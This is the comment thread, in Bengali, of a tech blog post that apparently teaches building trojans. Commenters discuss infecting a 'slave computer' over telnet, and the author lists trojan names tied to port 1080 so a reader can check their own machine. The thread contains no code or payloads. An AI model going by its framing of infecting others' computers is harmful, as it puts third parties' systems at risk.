  1. অসাধারন উপকারী টিউন। আসুন না ট্রোজানকে রিমুভ করার জন্য একটা ট্রোজান তৈরী করি। অর্থাৎ এটি বানানোর একটা পদ্ধতি থাকবে। পদ্ধতিটার একটা অংশ থাকবে কাস্টমাইজ করার জন্য। যা প্রত্যেকে তার কম্পিউটার বা সিস্টেম আই ডি বসিয়ে দিলে তার সিস্টেমকে সে অন্য ট্রোজান থেকে রক্ষা করবে অর্থাৎ অন্য ট্রোজানগুলোকে রিমুভ করে দেবে – এইরকম আর কি। মানে অনেকটা ট্রোজান হয়ে ট্রোজান খুঁজে বের করে সিস্টেমকে বাঁচাবে। তৈরী করা ট্রোজানটা স্পাই – এর কাজ করবে।
    আমি হাকিং – এর কিছুই জানিনা তবে আপনার টিউন পরে আমার ধারনা হল আপনি চেষ্টা করলে এমন একটা স্পাই ট্রোজান তৈরী করতে পারবেন ইনশাল্লাহ। আমি শুধু এই ”ক্লু”টা দিলাম। ভুল হলে ক্ষমা করবেন। ধন্যবাদ আবারও…

  2. অসাধারন হয়েছে। তবে আমার তৈরিকৃত ট্রোজান ভাইরাস্তি কি আমার পিসির কোন ক্ষতি করবে?

    • হ্যাকার হতে পারবেন কিনা জানিনা তবে পার্সোনাল সিক্যুরিটি তে টপ ক্লাস হবেন এটার গ্যারান্টি দিতে পারি :দ

    • স্লেভ কম্পিউটার মানে আপনি যে কম্পিউটার কে আক্রান্ত করতে চান & Talent client না ওটা telnet client । এটা একটা টার্মিনাল পোর্ট ইন্টারনেট কানেকশন এর জন্য । এটা সম্পর্কে আরো জানতে নিচের লিঙ্ক থেকে ঘুরে আসতে পারেন

      http://en.wikipedia.org/wiki/Telnet

  3. বাফ রে ! এতো ছডু ফুস্ট ! o_o সত্যি কথা কইতে, শেষে আইতে আইতে পরথমের কথা খাইয়া ফেলছি। আবার পরুম এখন।

    তবে যেইটুক মাথায় ঢুকছে, বুঝলাম কামের জিনিস :D

  4. অনির্বাচিত টিউনার মন্তব্য করে নাই এই পোষ্ট। যা দেখে খুবই ব্যথিত হলাম :)

    আপনার পোষ্ট অনেক অনেক চমৎকার হয়। যা বলার অপেক্ষা রাখে না। আসলে আপনার পোষ্টগুলো পড়েছি। কিন্তু মন্তব্য করতে পারি নি সময়ের কারণে :) চালিয়ে যান আপনার এই চরম ধারাবাহিক। আশা করি নিয়মিত লিখে যাবেন এটি :)

    • ধন্যবাদ অনির্বাচিত টিউনার :D আপনার মতামত , মন্তব্য সব সময় আমার জন্য অনেক উৎসাহব্যঞ্জক । অনেক অনেক ধন্যবাদ মূল্যবান মতামতের জন্য :)

  5. খুবই ভালো পোষ্ট।আপনি যদি ট্রোজেন খেকে বাচাঁর উপায় দিয়েছেন যদি ট্রোজেন থেকে বাঁচার সফটওয়্যার দিতেন তবে খুশি হতাম

    • কেন আপনার অ্যান্টিভাইরাস এই তো কাজ করার কথা !! যদি না হয় তাহলে তো্ নিজে কিভাবে করবেন ওটাও তো বলে দিলাম :D

  6. আমি এক্সপি ইউজার PID এর লিস্ট এ 1080 খুজে পেলাম এখন কি করব । {kasperskey internet Security 2012 চালাই অনির্বাচিত টিউনারের দেয়া ৩৫০ দিনের কী ফাইল দিয়া }

    • 1080 মূলত proxy পোর্ট !আপনি কি বস কোন আই পি চেঞ্জার ব্যবহার করেন ? অথবা কোন P2P নেটওয়ার্ক এ আছেন [ যেমন e-mule ]? অথবা আপনি কি শেয়ারিং আই পি ব্যবহার করছেন ?

      উপর উত্তর গুলো একটু দিবেন দয়া করে । আর windows task manager ওপেন করে services ট্যাব থেকে PID মিলিয়ে দেখুন তো নিচের প্রোগ্রাম গুলোর সাথে । একটুঁ জানান তো এগুলোর একটাও মিলে কিনা ? তার পর বলছি কি হয়েছে :/

      Bugbear.xx
      SubSeven
      WinHole
      Trojan.Webus.C
      Mydoom.B
      Wingate
      Bagle
      Backdoor.WLF
      BackGate
      SubSeven 2.2
      Lixy
      Mydoom
      W32.Beagle
      W32.HLLW.Deadhat
      Webus

      • মজিলার proxy এডঅন ইনেস্টল করা ছিল কিন্তু কোন দিন ব্যাবহার করা হয়নি । রিমুভ করে দেয়ার পর আর দেখায় না । আপনাকে অসংখ্য ধন্যবাদ ।

  7. Thanks for this nice post….trojan virus somporke kono bistarito boi ki pawa somvob?……ami autorun virus dea pendrive ar logo chenge korte pari …bt kharap hok r valo hok ami ro sekhte chi…please help.

    • আমি ঠিক জানি না কোন বই পাওয়া যায় কিন্তু কিন্তু পেলে অবশ্যই আপনাকে জানাব । আপনার মতামতের জন্য ধন্যবাদ

মন্তব্য দিন আপনার